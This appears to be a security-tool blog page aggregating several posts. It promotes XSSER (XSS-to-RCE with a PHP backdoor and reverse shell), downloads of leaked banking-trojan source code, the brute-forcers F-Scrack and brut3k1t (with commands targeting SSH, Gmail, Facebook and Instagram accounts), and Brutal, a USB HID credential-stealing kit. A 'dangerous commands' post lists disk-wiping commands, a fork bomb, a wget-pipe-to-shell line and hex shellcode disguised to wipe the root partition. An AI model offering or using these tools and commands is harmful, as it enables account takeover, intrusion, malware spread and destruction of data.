From XSS to RCE - XSSER

From XSS to RCE 2.5 - Black Hat Europe Arsenal 2016

Demo

• Version 2.0 - 2015: https://www.youtube.com/playlist?list=PLIjb28IYMQgqqqApoGRCZ_O40vP-eKsgf
• Version 2.5 - 2016: https://www.youtube.com/playlist?list=PLRic6PgcrsWGkgacL6WFnSQKVRZIoofRj

Requirements

• Python (2.7.*, version 2.7.11 was used for development and demo)
• Gnome
• Bash
• Msfconsole (accessible via environment variables)
• Netcat (nc)
• cURL (curl) [NEW]
• PyGame (apt-get install python-pygame) [NEW]

Payload Compatibility

• Chrome (14 Nov 2015) - This should still work.
• Firefox (04 Nov 2016) - Tested live at Black Hat Arsenal 2016

WordPress Lab

• WordPress http://wordpress.org/
• Better WP Security 3.5.3 http://www.exploit-db.com/wp-content/themes/exploit/applications/c6d6beb3c11bc58856e15218d512b851-better-wp-security.3.5.3.zip
• Optional: WPSEO https://yoast.com/wordpress/plugins/seo/

WordPress Exploit

• http://www.exploit-db.com/exploits/27290/

Joomla Lab

• Joomla https://www.joomla.org/
• SecurityCheck 2.8.9 https://www.exploit-db.com/apps/543ccd00b06d24be139d7e18212a0916-com_securitycheck_j3x-2.8.9.zip

Joomla Exploit

• https://www.exploit-db.com/exploits/39879/

Directories

• Audio: Contains remixed audio notifications.
• Exploits: Contains DirtyCow (DCOW) privilege escalation exploits.
• Joomla_Backdoor: Contains a sample Joomla extension backdoor which can be uploaded as an administrator and subsequently used to execute arbitrary commands on the system with system($_GET['c']).
• Payloads/javascript: Contains the JavaScript payloads. Contains a new "add new admin" payload for Joomla.
• Shells: Contains the PHP shells to inject, including a slightly modified version of pentestmonkey's shell that connects back via wget.

Developed By

• Hans-Michael Varbaek
• Sense of Security

Credits

• MaXe / InterN0T

Download XSSER

Read More

Collections of Malware source code - Leaked

This is leaked source code of Malwares.

Obs, I am not responsible for your actions

Source from:

http://www.malwaretech.com/p/sources.html Dexter v2 (Point of Sales Trojan) Rovnix (Bootkit) Carberp (Banking Trojan) Tinba (Tiny ASM Banking Trojan) Zeus (Banking Trojan) KINS (Banking Trojan) Dendroid (Android Trojan) Grum (Spam Bot) Pony 2.0 (Stealer) Alina Spark (Point of Sales Trojan) RIG Front-end (Exploit Kit)

Download Malware Source Code (OFF)

Read More

A Single File Bruteforcer Supports Multi-Protocol - F-Scrack

F-Scrack is a single file bruteforcer supports multi-protocol, no extra library requires except python standard library, which is ideal for a quick test.

Currently support protocol: FTP, MySQL, MSSQL，MongoDB，Redis，Telnet，Elasticsearch，PostgreSQL.

Compatible with OSX, Linux, Windows, Python 2.6+.

Usage
Options:

python F-Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10]

-h
Supports ip(192.168.1.1), ip range (192.168.1) (192.168.1.1-192.168.1.254), ip list (ip.ini) , maximum 65535 ips per scan.
-p
Ports you want to scan, use comma to separate multi ports. Eg 1433,3306,5432. 
Default scan ports(21,23,1433,3306,5432,6379,9200,11211,27017) if no ports specified.
-m
Number of threads. Default is 100.
-t
Seconds to wait before timeout.
-d
Dictionary file.
-n
Scan without ping scan(Live hosts detect).

Example:

python F-Scrack.py -h 10.111.1
python F-Scrack.py -h 192.168.1.1 -d pass.txt
python F-Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 6
python F-Scrack.py -h ip.ini -n

Download F-Scrack

Read More

Get detailed information about a Twitter user activity - Tinfoleak v2.0

Are you interested in OSINT tools? Tinfoleak is the best OSINT tool for Twitter, and is open-source!
The new version includes a lot of new and improved features:

• Search by coordinates
• Geolocated users
• Tagged users
• User conversations
• Identification in other social networks
• More powerful and flexible search filter
• More detailed information on existing features
• … and many more information to generate intelligence!

Screenshots

Download Tinfoleak V2.0

Read More

Making Wills by Noam Chomsky

Making Wills, by Noam Chomsky in Requiem for the American Dream.
Create and spread consumerism in an ingenious and effective way, transforming human beings into consumers with little or no critical sense to keep them hostage to the consumer society, always under control.

By OffSec

Read More

Dangerous Linux Commands

rm -rf Command

The rm -rf command is one of the fastest way to delete a folder and its contents. But a little typo or ignorance may result into unrecoverable system damage. The some of options used with rm command are.

1. rm command in Linux is used to delete files.
2. rm -r command deletes the folder recursively, even the empty folder.
3. rm -f command removes ‘Read only File’ without asking.
4. rm -rf / : Force deletion of everything in root directory.
5. rm -rf * : Force deletion of everything in current directory/working directory.
6. rm -rf . : Force deletion of current folder and sub folders.

Hence, be careful when you are executing rm -rf command. To overcome accidental delete of file by ‘rm‘ command, create an alias of ‘rm‘ command as ‘rm -i‘ in “.bashrc” file, it will ask you to confirm every deletion.

:(){:|:&};: Command

This command is actually a fork bomb. It operates by defining a function called ‘:‘, which calls itself twice, once in the foreground and once in the background. It keeps on executing again and again till the system freezes.

:(){:|:&};:

command > /dev/sda

The above example writes the output of ‘command‘ on the block /dev/sda. The above command writes raw data and all the files on the block will be replaced with raw data, thus resulting in total loss of data on the block.

mv folder /dev/null

The mv command will move ‘folder‘ to /dev/null. In Linux /dev/null or null device is a special file that discards all the data written to it and reports that write operation succeed.

# mv /home/user/* /dev/null

The above command will move all the contents of a User directory to /dev/null, which literally means everything there was sent to blackhole (null).

wget http://malicious_source -O- | sh

This wget example will download a script from a malicious source and then execute it.

mkfs.ext3 /dev/sda

The example will format the ‘sda’. After execution of the above command your Hard Disk Drive would be marked as ‘NEW’, You would be left without any data and in unrecoverable system stage.

> file

This command is used to flush the content of file. If the above command is executed with a typo or ignorance like “> xt.conf” it would ‘flush’ a configuration file or any other system file.

^foo^bar

This command is used to edit the previous run command without the need of retyping the whole command again. This can really be really dangerous.

dd if=/dev/random of=/dev/sda

This dd will wipe out the block device sda and write random junk. Your system would be left at inconsistent and unrecoverable stage.

Hidden Command

The command bellow is nothing more than a rm -rf. Here, the command is hidden in in hex and the user may be fooled into running it. Running this code will wipe your root partition. This command here shows that the threat may be hidden and not normally detectable sometimes.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Read More

An Intentionally Vulnerable Machine for Exploit Testing - Metasploitable3

Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities. It is intended to be used as a target for testing exploits with metasploit .

Metasploitable3 is released under a BSD-style license. See COPYING for more details.

Building Metasploitable 3

System Requirements:

• OS capable of running all of the required applications listed below
• VT-x/AMD-V Supported Processor recommended
• 65 GB Available space on drive
• 2.5 GB RAM

Requirements:

• Packer
• Vagrant
• Vagrant Reload Plugin
• VirtualBox 5.1.6
• Internet connection

NOTE: A bug was recently discovered in VirtualBox 5.1.8 that is breaking provisioning. More information here .

NOTE: A bug was recently discovered in Vagrant 1.8.7 on OSX that is breaking provisioning. More information here .

To build automatically:

1. Run the build_win2008.sh script if using bash, or build_win2008.ps1 if using Windows.
2. If the command completes successfully, run 'vagrant up'.
3. When this process completes, you should be able to open the VM within VirtualBox and login. The default credentials are U: vagrant and P: vagrant.

To build manually:

1. Clone this repo and navigate to the main directory.
2. Build the base VM image by running packer build windows_2008_r2.json . This will take a while the first time you run it since it has to download the OS installation ISO.
3. After the base Vagrant box is created you need to add it to your Vagrant environment. This can be done with the command vagrant box add windows_2008_r2_virtualbox.box --name=metasploitable3 .
4. Use vagrant plugin install vagrant-reload to install the reload vagrant provisioner if you haven't already.
5. To start the VM, run the command vagrant up . This will start up the VM and run all of the installation and configuration scripts necessary to set everything up. This takes about 10 minutes.

6. Once this process completes, you can open up the VM within VirtualBox and login. The default credentials are U: vagrant and P: vagrant.

Vulnerabilities

• See the wiki page

More Information

The wiki has a lot more detail and serves as the main source of documentation. Please check it out .

Acknowledgements

The Windows portion of this project was based off of GitHub user joefitzgerald's packer-windows project. The Packer templates, original Vagrantfile, and installation answer files were used as the base template and built upon for the needs of this project.

Download Metasploitable3

Read More

Toolkit to quickly create various Payload, PowerShell Attack, Virus Attack and Launch Listener for a HID - Brutal

Brutal is extremely useful for executing scripts on a target machine without the need for human-to-keyboard interaction ( HID -ATTACK ) .When you insert the device, it will be detected as a keyboard, and using the microprocessor and onboard flash memory storage, you can send a very fast set of keystrokes to the target’s machine and completely compromise it, regardless of autorun. I’ve used it in my security testing to run recon or enumeration scripts, execute reverse shells, exploit local DLL hijack/privilege escalation vulnerabilities, and get all password . Now im develop new tools the name is Brutal

So what Brutal ?

Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device

Screenshoot

Video

• Do you want like a mr robot hacking scene when Angela moss plug usb into computer for get credential information ? you can choose payload in brutal ( optional 3 or 4 )
  

The Goal

• Generate various payload and powershell attack without coding
  
• To help breaking computer very fast and agile :p
  
• The Payloads Compatibility > target Windows machines only
  

Requirements

• Arduino Software ( I used v1.6.7 )
  
• TeensyDuino
  
• Linux udev rules
  
• How install all requirements ? Visit This Wiki
  

Supported Hardware
The following hardware has been tested and is known to work.

• Teensy 3.x
  
• Usb Cable 

Getting Started

1. Copy and paste the PaensyLib folder inside your Arduino\libraries
2. git clone https://github.com/Screetsec/Brutal.git
3. cd Brutal
4. chmod +x Brutal.sh
5. sudo ./Brutal.sh or sudo su ./Brutal.sh

Credits

• Thanks to allah and Screetsec [ Edo -maland- ]
• Dracos Linux from Scratch Indonesia ( Awesome Penetration os ), you can see in http://dracos-linux.org/
• Offensive Security for the awesome OS ( http://www.offensive-security.com/ )
• http://www.kali.org/ "
  
• Jack Wilder admin in http://www.linuxsec.org
• And another open sources tool in github

Download Brutal

Read More

Server-side Brute-force Module (ssh, ftp, smtp, facebook, and more) - brut3k1t

Server-side brute-force module. Brute-force (dictionary attack, jk) attack that supports multiple protocols and services.

1. Introduction
brut3k1t is a server-side bruteforce module that supports dictionary attacks for several protocols. The current protocols that are complete and in support are:

ssh
ftp
smtp
XMPP
instagram
facebook

There will be future implementations of different protocols and services (including Twitter, Facebook, Instagram).

2. Installation
Installation is simple. brut3k1t requires several dependencies, although they will be installed by the program if you do not have it.

• argparse - utilized for parsing command line arguments
• paramiko - utilized for working with SSH connections and authentication
• ftplib - utilized for working with FTP connections and authentication
• smtplib - utilized for working with SMTP (email) connections and authentication
• fbchat - utilized for connecting with Facebook
• selenium - utilized for web scraping, which is used with Instagram (and later Twitter)
• xmppy - utiized for XMPP connections ...and more within the future!

Downloading is simple. Simply git clone .

git clone https://github.com/ex0dus-0x/brut3k1t

Change to directory:

cd /path/to/brut3k1t

3. Usage
Utilizing brut3k1t is a little more complicated than just running a Python file.
Typing python brut3k1t -h shows the help menu:

usage: brut3k1t.py [-h] [-s SERVICE] [-u USERNAME] [-w PASSWORD] [-a ADDRESS]
               [-p PORT] [-d DELAY]

Server-side bruteforce module written in Python

optional arguments:
-h, --help            show this help message and exit
-a ADDRESS, --address ADDRESS
                    Provide host address for specified service. Required
                    for certain protocols
-p PORT, --port PORT  Provide port for host address for specified service.
                    If not specified, will be automatically set
-d DELAY, --delay DELAY
                    Provide the number of seconds the program delays as
                    each password is tried

required arguments:
-s SERVICE, --service SERVICE
                    Provide a service being attacked. Several protocols
                    and services are supported
-u USERNAME, --username USERNAME
                    Provide a valid username for service/protocol being
                    executed
-w PASSWORD, --wordlist PASSWORD
                    Provide a wordlist or directory to a wordlist

Examples of usage:
Cracking SSH server running on 192.168.1.3 using root and wordlist.txt as a wordlist.

python brut3k1t.py -s ssh -a 192.168.1.3 -u root -w wordlist.txt

The program will automatically set the port to 22, but if it is different, specify with -p flag.
Cracking email test@gmail.com with wordlist.txt on port 25 with a 3 second delay. For email it is necessary to use the SMTP server's address. For e.g Gmail = smtp.gmail.com . You can research this using Google.

python brut3k1t.py -s smtp -a smtp.gmail.com -u test@gmail.com -w wordlist.txt -p 25 -d 3

Cracking XMPP test@creep.im with wordlist.txt on default port 5222 . XMPP also is similar to SMTP, whereas you will need to provide the address of the XMPP server, in this case  creep.im .

python brut3k1t.py -s xmpp -a creep.im -u test -w wordlist.txt

Cracking Facebook is quite a challenge, since you will require the target user ID, not the username.

python brut3k1t.py -s facebook -u 1234567890 -w wordlist.txt

Cracking Instagram with username test with wordlist wordlist.txt and a 5 second delay

 python brut3k1t.py -s instagram -u test -w wordlist.txt -d 5

## KEY NOTES TO REMEMBER

• If you do not supply the port -p flag, the default port for that service will be used. You do not need to provide it for Facebook and Instagram, since they are um... web-based. :)
  
• If you do not supply the delay -d flag, the default delay in seconds will be 1.
  
• Remember, use the SMTP server address and XMPP server address for the address -a flag, when cracking SMTP and XMPP, respectively.
  
• Facebook requires the username ID. This is a little bit of a setback since some people do not display their ID publicly on their profile.
  
• Make sure the wordlist and its directory is specified. If it is in /usr/local/wordlists/wordlist.txt specify that for the wordlist -w flag.
  
• Remember that some protocols are not based on their default port. A FTP server will not necessarily always be on port 21 . Please keep that in mind.
  
• Use this for educational and ethical hacking purposes, as well as the sake of learning code and security-oriented practices. No script kiddies!
  

Download brut3k1t

Read More